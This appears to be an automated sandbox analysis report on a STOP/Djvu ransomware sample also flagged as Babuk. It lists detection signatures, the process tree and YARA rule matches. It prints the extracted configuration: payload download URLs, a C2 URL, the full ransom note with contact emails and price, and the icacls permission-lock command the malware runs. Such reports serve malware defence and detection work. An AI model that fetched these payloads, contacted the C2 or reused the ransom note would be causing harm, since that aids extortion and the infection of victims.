Edit tour

Windows Analysis Report
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Overview

General Information

Sample name:	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Analysis ID:	1381448
MD5:	5cacd6f1b5cec25f3f0b0b3c4d5807d3
SHA1:	41b8851bc57462502b0113ee1f2579dff5d94f4f
SHA256:	c73cb93ad9ad6d003b505ce2b960d75467ad612786e0559c74dca18426fb9400
Tags:	exe
Infos:

Detection

Babuk, Djvu

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Babuk Ransomware

Yara detected Djvu Ransomware

C2 URLs / IPs found in malware configuration

Found stalling execution ending in API Sleep call

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe (PID: 7020 cmdline: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe MD5: 5CACD6F1B5CEC25F3F0B0B3C4D5807D3)

icacls.exe (PID: 2992 cmdline: icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask MD5: 5CACD6F1B5CEC25F3F0B0B3C4D5807D3)

baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe (PID: 7148 cmdline: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe --Task MD5: 5CACD6F1B5CEC25F3F0B0B3C4D5807D3)

baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe (PID: 6252 cmdline: "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart MD5: 5CACD6F1B5CEC25F3F0B0B3C4D5807D3)

baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe (PID: 6684 cmdline: "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart MD5: 5CACD6F1B5CEC25F3F0B0B3C4D5807D3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\\\ni6Rfb9WWM4K\\/vgKVvZi\\/+pA7wR6QvFBURdJ1Z9mdw8kYkafMfVuTEgbW+j4RDepy\\\\nRMc6ZcYdxsu2f4+XgrCWmwJw8wVmodWyLZqqeb1k4FONQs+uAP0AxLLTUbcAfP75\\\\ngGAW9KhqPhoYKVhzDqtFOqCvYqMylrgCNwHpTp75Bv5up3OfAE5h6+t\\/TfjQjDFJ\\\\nJY0Tgum721KiGGppZfsBDqY1Zv\\/F45h+MVk9mhfvBd3UZNJUZI5ewP1zbnOU1llz\\\\ndETA6WbQWWm4u4pamw3U0ZLnFDJQkUgOAbxOfVM4xpi0lrPyV+oTCXnpOgcF4YvU\\\\n2wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3570:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x2d787:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x36692:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xa438c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x435dae:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xf928f6:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4f42e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x7cd80:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x2b8fe:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x594da:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x36542:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0x697e9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
